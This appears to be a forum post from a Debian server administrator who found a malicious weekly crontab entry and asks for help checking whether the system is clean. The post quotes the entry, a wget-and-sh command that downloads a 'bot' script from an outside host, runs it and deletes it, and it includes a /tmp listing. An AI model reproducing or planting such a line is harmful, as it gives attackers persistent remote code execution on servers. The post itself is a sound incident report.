Regards,
since my server acted "weird" lately (pulling high bandwith during my nighttimes in spikes, then automatically stopping for the past few days) I inspected the server and found a crontab which pulled regular.bot from stablehost.us
Code:
@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1
A quick google search led me to the following CentOs (I'm running Debian) forum page:
https://www.centos.org/forums/viewtopic ... 17&t=48804Looking through my device in /tmp there are no scripts which shouldn't belong as far as I can see:
Code:
root@ragnarok:/tmp# ls -alh
total 24K
drwxrwxrwt 6 root root 4.0K Jan 4 13:45 .
drwxr-xr-x 24 root root 4.0K Jan 4 05:14 ..
drwxrwxrwt 2 root root 4.0K Dec 23 23:39 .ICE-unix
drwxrwxrwt 2 root root 4.0K Dec 23 23:39 .X11-unix
-rw-r--r-- 1 root root 0 Jan 4 13:16 .sh
drwxr-xr-x 2 root root 4.0K Dec 23 23:39 .webmin
Anyone able to provide more info with a means to make sure the system is clean ?
I know the best course of action would be to scrap the server and start over. This is scheduled but I currently don't yet have the time for it so if I could make sure it's not a threat at this minute, I could build the new machine on the scheduled time.
Regards,